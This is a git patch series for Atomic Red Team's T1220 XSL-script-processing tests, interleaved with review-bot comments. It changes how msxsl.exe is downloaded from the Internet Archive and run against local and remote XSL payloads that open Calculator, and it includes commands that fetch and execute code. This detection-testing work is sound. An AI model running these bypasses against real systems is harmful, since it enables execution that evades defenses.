From 3ce7e7909aa3c39520a33a3906ef49d43aa4934a Mon Sep 17 00:00:00 2001 From: JoustingZebra <80557158+JoustingZebra@users.noreply.github.com> Date: Fri, 29 Oct 2021 16:51:23 -0400 Subject: [PATCH 1/6] Create .gitignore --- atomics/T1220/bin./.gitignore | 52 +++++++++++++++++++++++++++++++++++ 1 file changed, 52 insertions(+) create mode 100644 atomics/T1220/bin./.gitignore diff --git a/atomics/T1220/bin./.gitignore b/atomics/T1220/bin./.gitignore new file mode 100644 index 00000000..c6127b38 --- /dev/null +++ b/atomics/T1220/bin./.gitignore @@ -0,0 +1,52 @@ +# Prerequisites +*.d + +# Object files +*.o +*.ko +*.obj +*.elf + +# Linker output +*.ilk +*.map +*.exp + +# Precompiled Headers +*.gch +*.pch + +# Libraries +*.lib +*.a +*.la +*.lo + +# Shared objects (inc. Windows DLLs) +*.dll +*.so +*.so.* +*.dylib + +# Executables +*.exe +*.out +*.app +*.i*86 +*.x86_64 +*.hex + +# Debug files +*.dSYM/ +*.su +*.idb +*.pdb + +# Kernel Module Compile Results +*.mod* +*.cmd +.tmp_versions/ +modules.order +Module.symvers +Mkfile.old +dkms.conf From fadc563c96d8e738d3b05e963c18c7a5de414e73 Mon Sep 17 00:00:00 2001 From: JoustingZebra <80557158+JoustingZebra@users.noreply.github.com> Date: Fri, 29 Oct 2021 16:51:42 -0400 Subject: [PATCH 2/6] Delete atomics/T1220/bin. directory --- atomics/T1220/bin./.gitignore | 52 ----------------------------------- 1 file changed, 52 deletions(-) delete mode 100644 atomics/T1220/bin./.gitignore diff --git a/atomics/T1220/bin./.gitignore b/atomics/T1220/bin./.gitignore deleted file mode 100644 index c6127b38..00000000 --- a/atomics/T1220/bin./.gitignore +++ /dev/null 
@@ -1,52 +0,0 @@ -# Prerequisites -*.d - -# Object files -*.o -*.ko -*.obj -*.elf - -# Linker output -*.ilk -*.map -*.exp - -# Precompiled Headers -*.gch -*.pch - -# Libraries -*.lib -*.a -*.la -*.lo - -# Shared objects (inc. Windows DLLs) -*.dll -*.so -*.so.* -*.dylib - -# Executables -*.exe -*.out -*.app -*.i*86 -*.x86_64 -*.hex - -# Debug files -*.dSYM/ -*.su -*.idb -*.pdb - -# Kernel Module Compile Results -*.mod* -*.cmd -.tmp_versions/ -modules.order -Module.symvers -Mkfile.old -dkms.conf From 6c4af49f595e9d1c50dfd4fabc5d0b4bbd33d378 Mon Sep 17 00:00:00 2001 From: JoustingZebra <80557158+JoustingZebra@users.noreply.github.com> Date: Fri, 29 Oct 2021 16:51:57 -0400 Subject: [PATCH 3/6] Create .gitignore --- atomics/T1220/bin/.gitignore | 1 + 1 file changed, 1 insertion(+) create mode 100644 atomics/T1220/bin/.gitignore diff --git a/atomics/T1220/bin/.gitignore b/atomics/T1220/bin/.gitignore new file mode 100644 index 00000000..be9bd124 --- /dev/null +++ b/atomics/T1220/bin/.gitignore @@ -0,0 +1 @@ +ignore From 2ae946496adab853988cca3561564777fb0eaf36 Mon Sep 17 00:00:00 2001 From: JoustingZebra <80557158+JoustingZebra@users.noreply.github.com> Date: Fri, 29 Oct 2021 16:53:02 -0400 Subject: [PATCH 4/6] Delete .gitignore --- atomics/T1220/bin/.gitignore | 1 - 1 file changed, 1 deletion(-) delete mode 100644 atomics/T1220/bin/.gitignore diff --git a/atomics/T1220/bin/.gitignore b/atomics/T1220/bin/.gitignore deleted file mode 100644 index be9bd124..00000000 --- a/atomics/T1220/bin/.gitignore +++ /dev/null @@ -1 +0,0 @@ -ignore From acd76a17a31f235533348167a9a6971525cc62b4 Mon Sep 17 00:00:00 2001 From: JoustingZebra <80557158+JoustingZebra@users.noreply.github.com> Date: Fri, 29 Oct 2021 16:54:25 -0400 Subject: [PATCH 5/6] Create .gitignore gitignore for /bin/ folder --- atomics/T1220/bin/.gitignore | 1 + 1 file changed, 1 insertion(+) create mode 100644 atomics/T1220/bin/.gitignore 
diff --git a/atomics/T1220/bin/.gitignore b/atomics/T1220/bin/.gitignore new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/atomics/T1220/bin/.gitignore @@ -0,0 +1 @@ + From decc37d1dce19e4b5899a65ca52db005ffb4bda6 Mon Sep 17 00:00:00 2001 From: JoustingZebra <80557158+JoustingZebra@users.noreply.github.com> Date: Fri, 29 Oct 2021 18:18:18 -0400 Subject: [PATCH 6/6] Fix for MSXSL dependency issues Added: Fixes for "MSXSL Bypass using remote files" T1220/bin/ folder for default msxsl.exe filepath. Input argument for filepath to msxls.exe Cleanup command to remove msxls.exe Capitalization fixes for "-ErrorAction Ignore" Fixed spelling "successfully" on line 10, 60, and 121. Split line 57 to get length under 150 characters. --- atomics/T1220/T1220.yaml | 46 +++++++++++++++++++++++++++++----------- 1 file changed, 34 insertions(+), 12 deletions(-) diff --git a/atomics/T1220/T1220.yaml b/atomics/T1220/T1220.yaml index 03936bd3..1656a3a4 100644 --- a/atomics/T1220/T1220.yaml +++ b/atomics/T1220/T1220.yaml @@ -5,8 +5,9 @@ atomic_tests: auto_generated_guid: ca23bfb2-023f-49c5-8802-e66997de462d description: | Executes the code specified within a XSL script tag during XSL transformation using a local payload. - Requires download of MSXSL from Microsoft (Available via Internet Archive https://web.archive.org/web/20200825011623/https://www.microsoft.com/en-us/download/details.aspx?id=21714 ). - Open Calculator.exe when test sucessfully executed, while AV turned off. + Requires download of MSXSL. No longer available from Microsoft. + (Available via Internet Archive https://web.archive.org/web/20200825011623/https://www.microsoft.com/en-us/download/details.aspx?id=21714 ) + Open Calculator.exe when test successfully executed, while AV turned off. supported_platforms: - windows input_arguments: 
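Review bot: The `.gitignore` created in this patch holds a single empty line, so it ignores nothing in `atomics/T1220/bin/`; the `msxsl.exe` that the prerequisite step in the last patch of this series downloads into that directory will appear as an untracked file and can be committed by accident. If the file exists to keep the otherwise-empty directory in the repository while excluding the binary, `*` on the first line followed by `!.gitignore` on the second does both. The commit message says "gitignore for /bin/ folder", which suggests the ignore behaviour was intended rather than just the placeholder.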
@@ -18,6 +19,10 @@ atomic_tests: description: Location of the test XSL script file on the local filesystem. type: Path default: PathToAtomicsFolder\T1220\src\msxslscript.xsl + msxsl_exe: + description: Location of the MSXSL executable. + type: Path + default: PathToAtomicsFolder\T1220\bin\msxsl.exe dependency_executor_name: powershell dependencies: - description: | 
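Review bot: The new `msxsl_exe` argument is described only as "Location of the MSXSL executable", but the dependency and cleanup commands added in the same patch download to and then delete whatever path is supplied, which a user pointing it at an existing copy of msxsl.exe would not expect. I would state that in the description: `description: Location of the MSXSL executable. If it is missing, the prerequisite step downloads it to this path, and the cleanup command deletes it.` The identical argument added to the remote-files test further down should carry the same wording.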
@@ -25,31 +30,34 @@ atomic_tests: prereq_command: | if (Test-Path #{xmlfile}) {exit 0} else {exit 1} get_prereq_command: | - New-Item -Type Directory (split-path #{xmlfile}) -ErrorAction ignore | Out-Null + New-Item -Type Directory (split-path #{xmlfile}) -ErrorAction Ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslxmlfile.xml" -OutFile "#{xmlfile}" - description: | XSL file must exist on disk at specified location (#{xslfile}) prereq_command: | if (Test-Path #{xslfile}) {exit 0} else {exit 1} get_prereq_command: | - New-Item -Type Directory (split-path #{xslfile}) -ErrorAction ignore | Out-Null + New-Item -Type Directory (split-path #{xslfile}) -ErrorAction Ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslscript.xsl" -OutFile "#{xslfile}" - description: | msxsl.exe must exist on disk at specified location (#{msxsl_exe}) prereq_command: | if (Test-Path #{msxsl_exe}) {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://web.archive.org/web/20200803205229/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe" -OutFile "$env:TEMP\msxsl.exe" - Copy-Item $env:TEMP\msxsl.exe #{msxsl_exe} -Force - Remove-Item $env:TEMP\msxsl.exe + Invoke-WebRequest "https://web.archive.org/web/20200803205229/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe" -OutFile "#{msxsl_exe}" executor: command: | - C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile} + #{msxsl_exe} #{xmlfile} #{xslfile} + cleanup_command: | + Remove-Item -Path #{msxsl_exe} -Force -ErrorAction Ignore name: command_prompt - name: MSXSL Bypass using remote files auto_generated_guid: a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985 description: | - Executes the code specified within a XSL script tag during XSL transformation using a remote payload. 
Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe when test sucessfully executed, while AV turned off. + Executes the code specified within a XSL script tag during XSL transformation using a remote payload. + Requires download of MSXSL.exe. No longer available from Microsoft. + (Available via Internet Archive https://web.archive.org/web/20200825011623/https://www.microsoft.com/en-us/download/details.aspx?id=21714 ) + Open Calculator.exe when test successfully executed, while AV turned off. supported_platforms: - windows input_arguments: @@ -61,9 +69,23 @@ atomic_tests: description: Remote location (URL) of the test XSL script file. type: Url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl + msxsl_exe: + description: Location of the MSXSL executable. + type: Path + default: PathToAtomicsFolder\T1220\bin\msxsl.exe + dependency_executor_name: powershell + dependencies: + - description: | + msxsl.exe must exist on disk at specified location (#{msxsl_exe}) + prereq_command: | + if (Test-Path #{msxsl_exe}) {exit 0} else {exit 1} + get_prereq_command: | + Invoke-WebRequest "https://web.archive.org/web/20200803205229/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe" -OutFile "#{msxsl_exe}" executor: command: | - C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile} + #{msxsl_exe} #{xmlfile} #{xslfile} + cleanup_command: | + Remove-Item -Path #{msxsl_exe} -Force -ErrorAction Ignore name: command_prompt - name: WMIC bypass using local XSL file auto_generated_guid: 1b237334-3e21-4a0c-8178-b8c996124988 
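Review bot: The rewritten `get_prereq_command` writes the Internet Archive download straight to `#{msxsl_exe}` without creating its parent directory and without any integrity check, and the executor line `#{msxsl_exe} #{xmlfile} #{xslfile}` then runs that binary; the other two prerequisites in this hunk create their target directory with `New-Item -Type Directory (split-path …)`, so the new one should too. Because this is an executable fetched over the network and executed immediately, compare its SHA256 against a pinned value and delete the file on mismatch rather than running it; the hash itself is not in the patch and has to be recorded by whoever merges this. The old `$env:TEMP` staging that was dropped is not needed once those two checks are in place. The remote-files test whose `input_arguments:` closes this hunk continues in the next hunk.

```yaml
    get_prereq_command: |
      New-Item -Type Directory (split-path "#{msxsl_exe}") -ErrorAction Ignore | Out-Null
      Invoke-WebRequest "https://web.archive.org/web/20200803205229/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe" -OutFile "#{msxsl_exe}"
      # pin the SHA256 of the archived msxsl.exe here before merging; it is not derivable from this patch
      if ((Get-FileHash "#{msxsl_exe}" -Algorithm SHA256).Hash -ne "<expected SHA256>") { Remove-Item "#{msxsl_exe}" -Force; throw "msxsl.exe hash mismatch" }
```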
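Review bot: The `cleanup_command` added to the remote-files test, `Remove-Item -Path #{msxsl_exe} -Force -ErrorAction Ignore`, passes the path unquoted, as does the executor line `#{msxsl_exe} #{xmlfile} #{xslfile}`, so a `PathToAtomicsFolder` containing a space is likely to break argument binding in both. Quote the substitution in each: `Remove-Item -Path "#{msxsl_exe}" -Force -ErrorAction Ignore` and `"#{msxsl_exe}" #{xmlfile} #{xslfile}`. Separately, this cleanup deletes the binary at whatever path the caller supplied, not only one the prerequisite downloaded, so a user who set `msxsl_exe` to an existing installation loses it; the cleanup added to the local-files test in the previous hunk has the same property. The WMIC test that starts at the end of this hunk continues outside it.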
@@ -87,7 +109,7 @@ atomic_tests: prereq_command: | if (Test-Path #{local_xsl_file}) {exit 0} else {exit 1} get_prereq_command: | - New-Item -Type Directory (split-path #{local_xsl_file}) -ErrorAction ignore | Out-Null + New-Item -Type Directory (split-path #{local_xsl_file}) -ErrorAction Ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/wmicscript.xsl" -OutFile "#{local_xsl_file}" executor: command: | @@ -96,7 +118,7 @@ atomic_tests: - name: WMIC bypass using remote XSL file auto_generated_guid: 7f5be499-33be-4129-a560-66021f379b9b description: | - Executes the code specified within a XSL script using a remote payload. Open Calculator.exe when test sucessfully executed, while AV turned off. + Executes the code specified within a XSL script using a remote payload. Open Calculator.exe when test successfully executed, while AV turned off. supported_platforms: - windows input_arguments: